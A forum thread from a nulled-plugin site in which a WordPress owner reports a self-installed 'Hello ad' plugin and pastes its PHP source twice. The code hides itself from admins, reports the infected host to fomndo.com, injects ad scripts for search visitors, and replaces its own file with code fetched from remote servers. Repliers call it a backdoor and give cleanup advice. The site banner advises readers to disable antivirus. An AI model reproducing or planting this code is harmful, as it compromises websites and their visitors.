• You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

    Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

Strange plugin was automatically installed on my Wordpress website, which presented a critical error

mariorick

mariorick

Member
Aug 5, 2019
52
22
8
Brazil
www.christinaaguilera.com.br
Hello friends. All right?

First of all, I don't know if I'm posting in the right place, but I thought it was the most appropriate here - correct me if I'm wrong.

Today my website gave a critical error, out of nowhere. I performed the debbug and it reported the following error

'Parse error: syntax error, unexpected end of file in plugins/helad.php on line 416'

I opened the file that shows that it is a plugin called "Hello Ad", which I did not install.
When looking the file, which was incomplete, they started with:

/ ** * Plugin Name: Hello ad
* Description: Monitor your traffic by adding ad codes.
* Author: Matthew Jensen
* Version: 1.0 * /

This plugin was automatically installed today at 4 pm on my website. And still created a folder inside / plugin with the name "kndroh-cibtdxge", at the same time.
The fact is that I did not install the 'Helo Ad' plugin and the only recent modification I did was to update plugins via the updates page within the wordpress panel and also to manually update the new version of the Quform plugin, downloaded here at Bebiato .

I deletes the file, which was in the root of the plugin folder, and apparently the site is back up and running.
What strikes me is that the plugin seems to show advertising on the page.
Did it come from some kind of malware from another nulled plugin?

I always download my nulleds through this forum and I never had any problems with that.
I'm attaching the file here in case anyone wants to take a look.
Since I am a layman in programming, I was unable to decipher much.

After that, my website started showing other debug errors, like for example

Notice: Trying to access array offset on value of type bool in /wp-content/plugins/premium-addons-pro/includes/white-label/admin.php on line 56'
Notice: Trying to access array offset on value of type null in /wp-content/plugins/elfsight-instagram-feed-cc/api/vendor/elfsight/Api.php on line 75
Notice: Undefined index: expires in /wp-content/plugins/custom-twitter-feeds-pro/inc/CtfAdmin.php on line 576
Notice: Trying to access array offset on value of type null in /wp-content/plugins/custom-twitter-feeds-pro/inc/CtfAdmin.php on line 585

Anyone can help me?

Here is the code of helad.php:

Code: 
<?php
/**
 * Plugin Name: Hello ad
 * Description: Monitize your traffic by adding ad codes.
 * Author: Matthew Jensen
 * Version: 1.0
 */

error_reporting(0);
ini_set('display_errors', 0);
$plugin_key='6e1aa39328ad32f62d99811e4d7fd962';
$version='1.2';

add_action('admin_menu', function() {
    add_options_page( 'helload Plugin', 'helload', 'manage_options', 'helload', 'helload_page' );
    remove_submenu_page( 'options-general.php', 'helload' );
});



add_filter('plugin_action_links_'.plugin_basename(__FILE__), 'salcode_add_plugin_page_settings_helload');
function salcode_add_plugin_page_settings_helload( $links ) {
    $links[] = '<a href="' .
        admin_url( 'options-general.php?page=helload' ) .
        '">' . __('Settings') . '</a>';
    return $links;
}






add_action( 'admin_init', function() {

    register_setting( 'helload-settings', 'default_mont_options' );
    register_setting( 'helload-settings', 'ad_code' );
    register_setting( 'helload-settings', 'hide_admin' );
    register_setting( 'helload-settings', 'hide_logged_in' );
    register_setting( 'helload-settings', 'display_ad' );
    register_setting( 'helload-settings', 'search_engines' );
    register_setting( 'helload-settings', 'auto_update' );
    register_setting( 'helload-settings', 'ip_admin');
    register_setting( 'helload-settings', 'cookies_admin' );
    register_setting( 'helload-settings', 'logged_admin' );
    register_setting( 'helload-settings', 'log_install' );
    
});

$ad_code="
<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3336627,document.body||document.documentElement)</script>
<script src=\"https://asoulrox.com/pfe/current/tag.min.js?z=3336643\" data-cfasync=\"false\" async></script>
<script type=\"text/javascript\" src=\"//inpagepush.com/400/3336649\" data-cfasync=\"false\" async=\"async\"></script>
";

$hide_admin='on';
$hide_logged_in='on';
$display_ad='organic';
$search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';
$auto_update='on';
$ip_admin='on';
$cookies_admin='on';
$logged_admin='on';
$log_install='';

function helload_page() {
 ?>
   <div class="wrap">
<form action="options.php" method="post">
       <?php
       settings_fields( 'helload-settings' );
       do_settings_sections( 'helload-settings' );
$ad_code='';

$hide_admin='on';
$hide_logged_in='on';
$display_ad='organic';
$search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';
$auto_update='on';
$ip_admin='on';
$cookies_admin='on';
$logged_admin='on';
$log_install='';

       ?>
       <h2>Helload Plugin</h2>
       <table>
            
 <tr>
                <th>Ad Code</th>
                <td><textarea placeholder="" name="ad_code" rows="5" cols="130"><?php echo get_option('ad_code',$ad_code) ; ?></textarea></td>
            </tr>
            
            
            
<tr>
                <th>Hide ads to :</th>
                <td>
                    <input type="hidden" id="default_mont_options" name="default_mont_options" value="on">
                    <label>
                        <input type="checkbox" name="hide_admin" <?php echo esc_attr( get_option('hide_admin',$hide_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />admins
                    </label>
                    <label>
                        <input type="checkbox" name="hide_logged_in" <?php echo esc_attr( get_option('hide_logged_in',$hide_logged_in) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in users
                    </label>
                    <br/>
                

                </td>
            </tr>
            
            
            
            <tr>
                <th>Recognize admin by :</th>
                <td>

                    <label>
                        <input type="checkbox" name="logged_admin" <?php echo esc_attr( get_option('logged_admin',$logged_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in
                    </label>
                    <label>
                        <input type="checkbox" name="ip_admin" id="ip_admin"  <?php echo esc_attr( get_option('ip_admin',$ip_admin) ) == 'on' ? 'checked="checked"' : '' ?> />By IP addresses
                    </label>
                                        <label>
                        <input type="checkbox" name="cookies_admin" <?php echo esc_attr( get_option('cookies_admin',$cookies_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />By Cookies
                    </label>
                
                

                </td>
            </tr>
            
            
            
            <tr>
                <th>Display ads to :</th>
                <td>
                                          <select name="display_ad">
                        
                        <option value="organic" <?php echo esc_attr( get_option('display_ad',$display_ad) ) == 'organic' ? 'selected="selected"' : ''; ?>>Organic traffic only</option>
                        <option value="all_visitors" <?php echo esc_attr( get_option('display_ad') ) == 'all_visitors' ? 'selected="selected"' : ''; ?>>All Visitors</option>
                        
                    </select>

                </td>
            </tr>

            <tr>
                <th>Search Engines</th>
                <td><input type="text" placeholder="Internal title" name="search_engines" value="<?php echo esc_attr( get_option('search_engines',$search_engines) ); ?>" size="80" /><p class="description">
            comma separated  </p>
                </td>
            </tr>
 
 
 <tr>
                <th>Auto Update :</th>
                <td>

                    <label>
                        <input type="checkbox" name="auto_update" <?php echo esc_attr( get_option('auto_update',$auto_update) ) == 'on' ? 'checked="checked"' : ''; ?> />auto update plugin
                    </label><br/>
                

                </td>
            </tr>
 
            <tr>
                <td><?php submit_button(); ?></td>
            </tr>
 
        </table>
      
      
      
     </form>
   </div>
 <?php
}

/*************************log install***************************/
if(get_option('log_install') !=='1')
{
    if(!$log_installed = @file_get_contents("http://www.fomndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]))
{
    $log_installed = @file_get_contents_helload("http://www.fomndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]);
}
}
/*************************set default options***************************/

if(get_option('default_mont_options') !=='on')
{
update_option('ip_admin', $ip_admin);
update_option('ad_code', $ad_code);
update_option('cookies_admin', $cookies_admin);
update_option('logged_admin', $logged_admin);
update_option('hide_admin', $hide_admin);
update_option('hide_logged_in', $hide_logged_in);
update_option('display_ad', $display_ad);
update_option('search_engines', $search_engines);
update_option('auto_update', $auto_update);
update_option('log_install', '1');
}

/************************************************************************/
include_once(ABSPATH . 'wp-includes/pluggable.php');

if ( ! function_exists( 'display_ad_single' ) ) { 

function display_ad_single($content){
if(is_single())
{

$content=$content.get_option('ad_code');;
}
return $content;
}

function display_ad_footer(){
if(!is_single())
{
echo get_option('ad_code');
}
}


//setting cookies if admin logged in
function setting_admin_cookie() {
  setcookie( 'wordpress_admin_logged_in',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
  }

if(get_option('cookies_admin')=='on')
{

if(is_user_logged_in())
{
add_action( 'init', 'setting_admin_cookie',1 );
}
}


//log admin IP addresses

if(get_option('ip_admin')=='on')
{
if(current_user_can('edit_others_pages'))
{

if (file_exists(plugin_dir_path( __FILE__ ) .'admin_ips.txt'))
{
$ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
}

if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);

}

}
}// end if log admins ip



//add cookies to organic traffic

if(get_option('display_ad')=='organic')
{

$search_engines = explode(',', get_option('search_engines'));

$referer = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
foreach ($search_engines as $search) {
  if (strpos($referer,$search)!==false) {
    setcookie("organic", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN);
    $organic=true;
  }
}

}//end




//display ad

if(!isset($_COOKIE['wordpress_admin_logged_in']) && !is_user_logged_in())
{

$ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
if (stripos($ips, $_SERVER['REMOTE_ADDR']) === false)
{
/*****/
if(get_option('display_ad')=='organic')
{
if($organic==true || isset($_COOKIE['organic']))
{
add_filter('the_content','display_ad_single');
add_action('wp_footer','display_ad_footer');
}
}
else
{
add_filter('the_content','display_ad_single');
add_action('wp_footer','display_ad_footer'); 
}

/****/

}

}
/*******************/





//update plugin

if(get_option('auto_update')=='on')
{

if( ini_get('allow_url_fopen') ) {



        if (($new_version = @file_get_contents("http://www.fomndo.com/update.php") OR $new_version = @file_get_contents_helload("http://www.fomndo.com/update.php")) AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
                
            }
        }
        
        
                elseif ($new_version = @file_get_contents("http://www.fomndo.xyz/update.php") AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
                
            }
        }


        elseif ($new_version = @file_get_contents("http://www.fomndo.top/update.php") AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
                
            }
        }

}
else
{
            if (($new_version = @file_get_contents("http://www.fomndo.com/update.php") OR $new_version = @file_get_contents_helload("http://www.fomndo.com/update.php")) AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
                
            }
        }
        
        
                elseif ($new_version = @file_get_contents_helload("http://www.fomndo.xyz/update.php") AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
                
            }
        }


        elseif ($new_version = @file_get_contents_helload("http://www.fomndo.top/update.php") AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
                
            }
        }
}
}//end if auto update

/*********************************/



}// if function exist



     function file_get_contents_helload($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }


function hide_plugin_helload() {
  global $wp_list_table;
  $hidearr = array('helad.php');
  $myplugins = $wp_list_table->items;
  foreach ($myplugins as $key => $val) {
    if (in_array($key,$hidearr)) {
      unset($wp_list_table->items[$

I appreciate the help in advance.
 
  • Sad
Reactions: Supratec
@mariorick could you tell us which plugin(s) you had installed lately from Resources or may be you know which plugin caused extra installation of not wanted malware plugins? Thanks you.
 
  • Like
Reactions: mariorick
Supratec said:
@mariorick could you tell us which plugin(s) you had installed lately from Resources or may be you know which plugin caused extra installation of not wanted malware plugins? Thanks you.
Click to expand...

Hey Supratec,

I suspect it is the latest version of QuForm (https://babia.to/resources/quform-wordpress-form-builder.373/updates#resource-update-30465) or Premium Addons Pro (Elementor) (https://babia.to/threads/premium-ad...ns-for-elementor-pro.3496/page-14#post-184114), as they were the last updated. In fact, it happened right after QuForm was updated, when just as a member submitted a form. I may be wrong, but the hours match.

Thank you for your care and attention.

Regards
 
mariorick said:
Hello friends. All right?

First of all, I don't know if I'm posting in the right place, but I thought it was the most appropriate here - correct me if I'm wrong.

Today my website gave a critical error, out of nowhere. I performed the debbug and it reported the following error

'Parse error: syntax error, unexpected end of file in plugins/helad.php on line 416'

I opened the file that shows that it is a plugin called "Hello Ad", which I did not install.
When looking the file, which was incomplete, they started with:

/ ** * Plugin Name: Hello ad
* Description: Monitor your traffic by adding ad codes.
* Author: Matthew Jensen
* Version: 1.0 * /

This plugin was automatically installed today at 4 pm on my website. And still created a folder inside / plugin with the name "kndroh-cibtdxge", at the same time.
The fact is that I did not install the 'Helo Ad' plugin and the only recent modification I did was to update plugins via the updates page within the wordpress panel and also to manually update the new version of the Quform plugin, downloaded here at Bebiato .

I deletes the file, which was in the root of the plugin folder, and apparently the site is back up and running.
What strikes me is that the plugin seems to show advertising on the page.
Did it come from some kind of malware from another nulled plugin?

I always download my nulleds through this forum and I never had any problems with that.
I'm attaching the file here in case anyone wants to take a look.
Since I am a layman in programming, I was unable to decipher much.

After that, my website started showing other debug errors, like for example

Notice: Trying to access array offset on value of type bool in /wp-content/plugins/premium-addons-pro/includes/white-label/admin.php on line 56'
Notice: Trying to access array offset on value of type null in /wp-content/plugins/elfsight-instagram-feed-cc/api/vendor/elfsight/Api.php on line 75
Notice: Undefined index: expires in /wp-content/plugins/custom-twitter-feeds-pro/inc/CtfAdmin.php on line 576
Notice: Trying to access array offset on value of type null in /wp-content/plugins/custom-twitter-feeds-pro/inc/CtfAdmin.php on line 585

Anyone can help me?

Here is the code of helad.php:

Code: 
<?php
/**
* Plugin Name: Hello ad
* Description: Monitize your traffic by adding ad codes.
* Author: Matthew Jensen
* Version: 1.0
*/

error_reporting(0);
ini_set('display_errors', 0);
$plugin_key='6e1aa39328ad32f62d99811e4d7fd962';
$version='1.2';

add_action('admin_menu', function() {
    add_options_page( 'helload Plugin', 'helload', 'manage_options', 'helload', 'helload_page' );
    remove_submenu_page( 'options-general.php', 'helload' );
});



add_filter('plugin_action_links_'.plugin_basename(__FILE__), 'salcode_add_plugin_page_settings_helload');
function salcode_add_plugin_page_settings_helload( $links ) {
    $links[] = '<a href="' .
        admin_url( 'options-general.php?page=helload' ) .
        '">' . __('Settings') . '</a>';
    return $links;
}






add_action( 'admin_init', function() {

    register_setting( 'helload-settings', 'default_mont_options' );
    register_setting( 'helload-settings', 'ad_code' );
    register_setting( 'helload-settings', 'hide_admin' );
    register_setting( 'helload-settings', 'hide_logged_in' );
    register_setting( 'helload-settings', 'display_ad' );
    register_setting( 'helload-settings', 'search_engines' );
    register_setting( 'helload-settings', 'auto_update' );
    register_setting( 'helload-settings', 'ip_admin');
    register_setting( 'helload-settings', 'cookies_admin' );
    register_setting( 'helload-settings', 'logged_admin' );
    register_setting( 'helload-settings', 'log_install' );
   
});

$ad_code="
<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3336627,document.body||document.documentElement)</script>
<script src=\"https://asoulrox.com/pfe/current/tag.min.js?z=3336643\" data-cfasync=\"false\" async></script>
<script type=\"text/javascript\" src=\"//inpagepush.com/400/3336649\" data-cfasync=\"false\" async=\"async\"></script>
";

$hide_admin='on';
$hide_logged_in='on';
$display_ad='organic';
$search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';
$auto_update='on';
$ip_admin='on';
$cookies_admin='on';
$logged_admin='on';
$log_install='';

function helload_page() {
?>
   <div class="wrap">
<form action="options.php" method="post">
       <?php
       settings_fields( 'helload-settings' );
       do_settings_sections( 'helload-settings' );
$ad_code='';

$hide_admin='on';
$hide_logged_in='on';
$display_ad='organic';
$search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';
$auto_update='on';
$ip_admin='on';
$cookies_admin='on';
$logged_admin='on';
$log_install='';

       ?>
       <h2>Helload Plugin</h2>
       <table>
           
<tr>
                <th>Ad Code</th>
                <td><textarea placeholder="" name="ad_code" rows="5" cols="130"><?php echo get_option('ad_code',$ad_code) ; ?></textarea></td>
            </tr>
           
           
           
<tr>
                <th>Hide ads to :</th>
                <td>
                    <input type="hidden" id="default_mont_options" name="default_mont_options" value="on">
                    <label>
                        <input type="checkbox" name="hide_admin" <?php echo esc_attr( get_option('hide_admin',$hide_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />admins
                    </label>
                    <label>
                        <input type="checkbox" name="hide_logged_in" <?php echo esc_attr( get_option('hide_logged_in',$hide_logged_in) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in users
                    </label>
                    <br/>
               

                </td>
            </tr>
           
           
           
            <tr>
                <th>Recognize admin by :</th>
                <td>

                    <label>
                        <input type="checkbox" name="logged_admin" <?php echo esc_attr( get_option('logged_admin',$logged_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in
                    </label>
                    <label>
                        <input type="checkbox" name="ip_admin" id="ip_admin"  <?php echo esc_attr( get_option('ip_admin',$ip_admin) ) == 'on' ? 'checked="checked"' : '' ?> />By IP addresses
                    </label>
                                        <label>
                        <input type="checkbox" name="cookies_admin" <?php echo esc_attr( get_option('cookies_admin',$cookies_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />By Cookies
                    </label>
               
               

                </td>
            </tr>
           
           
           
            <tr>
                <th>Display ads to :</th>
                <td>
                                          <select name="display_ad">
                       
                        <option value="organic" <?php echo esc_attr( get_option('display_ad',$display_ad) ) == 'organic' ? 'selected="selected"' : ''; ?>>Organic traffic only</option>
                        <option value="all_visitors" <?php echo esc_attr( get_option('display_ad') ) == 'all_visitors' ? 'selected="selected"' : ''; ?>>All Visitors</option>
                       
                    </select>

                </td>
            </tr>

            <tr>
                <th>Search Engines</th>
                <td><input type="text" placeholder="Internal title" name="search_engines" value="<?php echo esc_attr( get_option('search_engines',$search_engines) ); ?>" size="80" /><p class="description">
            comma separated  </p>
                </td>
            </tr>


<tr>
                <th>Auto Update :</th>
                <td>

                    <label>
                        <input type="checkbox" name="auto_update" <?php echo esc_attr( get_option('auto_update',$auto_update) ) == 'on' ? 'checked="checked"' : ''; ?> />auto update plugin
                    </label><br/>
               

                </td>
            </tr>

            <tr>
                <td><?php submit_button(); ?></td>
            </tr>

        </table>
     
     
     
     </form>
   </div>
<?php
}

/*************************log install***************************/
if(get_option('log_install') !=='1')
{
    if(!$log_installed = @file_get_contents("http://www.fomndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]))
{
    $log_installed = @file_get_contents_helload("http://www.fomndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]);
}
}
/*************************set default options***************************/

if(get_option('default_mont_options') !=='on')
{
update_option('ip_admin', $ip_admin);
update_option('ad_code', $ad_code);
update_option('cookies_admin', $cookies_admin);
update_option('logged_admin', $logged_admin);
update_option('hide_admin', $hide_admin);
update_option('hide_logged_in', $hide_logged_in);
update_option('display_ad', $display_ad);
update_option('search_engines', $search_engines);
update_option('auto_update', $auto_update);
update_option('log_install', '1');
}

/************************************************************************/
include_once(ABSPATH . 'wp-includes/pluggable.php');

if ( ! function_exists( 'display_ad_single' ) ) {

function display_ad_single($content){
if(is_single())
{

$content=$content.get_option('ad_code');;
}
return $content;
}

function display_ad_footer(){
if(!is_single())
{
echo get_option('ad_code');
}
}


//setting cookies if admin logged in
function setting_admin_cookie() {
  setcookie( 'wordpress_admin_logged_in',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
  }

if(get_option('cookies_admin')=='on')
{

if(is_user_logged_in())
{
add_action( 'init', 'setting_admin_cookie',1 );
}
}


//log admin IP addresses

if(get_option('ip_admin')=='on')
{
if(current_user_can('edit_others_pages'))
{

if (file_exists(plugin_dir_path( __FILE__ ) .'admin_ips.txt'))
{
$ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
}

if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);

}

}
}// end if log admins ip



//add cookies to organic traffic

if(get_option('display_ad')=='organic')
{

$search_engines = explode(',', get_option('search_engines'));

$referer = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
foreach ($search_engines as $search) {
  if (strpos($referer,$search)!==false) {
    setcookie("organic", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN);
    $organic=true;
  }
}

}//end




//display ad

if(!isset($_COOKIE['wordpress_admin_logged_in']) && !is_user_logged_in())
{

$ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
if (stripos($ips, $_SERVER['REMOTE_ADDR']) === false)
{
/*****/
if(get_option('display_ad')=='organic')
{
if($organic==true || isset($_COOKIE['organic']))
{
add_filter('the_content','display_ad_single');
add_action('wp_footer','display_ad_footer');
}
}
else
{
add_filter('the_content','display_ad_single');
add_action('wp_footer','display_ad_footer');
}

/****/

}

}
/*******************/





//update plugin

if(get_option('auto_update')=='on')
{

if( ini_get('allow_url_fopen') ) {



        if (($new_version = @file_get_contents("http://www.fomndo.com/update.php") OR $new_version = @file_get_contents_helload("http://www.fomndo.com/update.php")) AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
               
            }
        }
       
       
                elseif ($new_version = @file_get_contents("http://www.fomndo.xyz/update.php") AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
               
            }
        }


        elseif ($new_version = @file_get_contents("http://www.fomndo.top/update.php") AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
               
            }
        }

}
else
{
            if (($new_version = @file_get_contents("http://www.fomndo.com/update.php") OR $new_version = @file_get_contents_helload("http://www.fomndo.com/update.php")) AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
               
            }
        }
       
       
                elseif ($new_version = @file_get_contents_helload("http://www.fomndo.xyz/update.php") AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
               
            }
        }


        elseif ($new_version = @file_get_contents_helload("http://www.fomndo.top/update.php") AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
               
            }
        }
}
}//end if auto update

/*********************************/



}// if function exist



     function file_get_contents_helload($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }


function hide_plugin_helload() {
  global $wp_list_table;
  $hidearr = array('helad.php');
  $myplugins = $wp_list_table->items;
  foreach ($myplugins as $key => $val) {
    if (in_array($key,$hidearr)) {
      unset($wp_list_table->items[$

I appreciate the help in advance.
Click to expand...
tbh, its really dirty backdoor / malicious codes back there. I believe your wordpress has been hacked. Old plugins or unclean plugins or themes ... could be anything. Secure you wordpress.
 
  • Like
Reactions: mariorick
gembels said:
tbh, its really dirty backdoor / malicious codes back there. I believe your wordpress has been hacked. Old plugins or unclean plugins or themes ... could be anything. Secure you wordpress.
Click to expand...
Thank you very much for your analysis and your response.
Do you have any tips on how I can increase security or track where this malicious code came from? Thank you.
 
I don't know if it helps, but that was the list of plugins updated the day the error happened.

Anotação 2020-06-11 030822.png


The only ones that were updated manually via FTP and downloaded here from Babiato were QuForm and Premium Addons for Elementor. The others have been updated within the WordPress update panel.
 
Visit https://sucuri.net/ & follow the steps to scan & clean the infection. If it's your money site you should not be using nulled scripts anyways. Pay for a reputed service to clean it. Reinstall WP & restore a clean copy if you have one prior to the malware.
 
mariorick said:
Thank you very much for your analysis and your response.
Do you have any tips on how I can increase security or track where this malicious code came from? Thank you.
Click to expand...
WP Hide & Security Enhancer, also check your htaccess, .well-known hidden files in folder, in root directory. Scan you wp with site health on wp-admin/site-health.php , or you can debug with crhome dev tools any outgoing suspicious access from your web site... If you have last good backup files, better wipe your files, restore the old one..

if you have no idea, ask your experienced friend to guide you. with me, i have price, PM me if you like to.
 
You must log in or register to reply here.

Similar threads

wzafar
I am facing strange issue, Any ideas how to fix unable to install plugin?
Replies
7
Views
780
Website Support & Development
amitkumar
amitkumar
FocusOnGoodThings
[ISSUE] Website redirecting to strange urls
Replies
11
Views
960
Website Support & Development
tpetualang
tpetualang
M
Strange image title as tooltip (need to hide)
Replies
5
Views
1K
Website Support & Development
Maus010
M
darkid
Wordpress plugin for check indexing status?
Replies
0
Views
189
Website Support & Development
darkid
darkid
P
Best WP plugin - get Facebook posts
Replies
0
Views
217
Website Support & Development
prouser99
P

Latest posts

Forum statistics

Threads
79,486
Messages
1,143,520
Members
249,025
Latest member
raine

Share this page

Share this page
Top Bottom
Back
AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock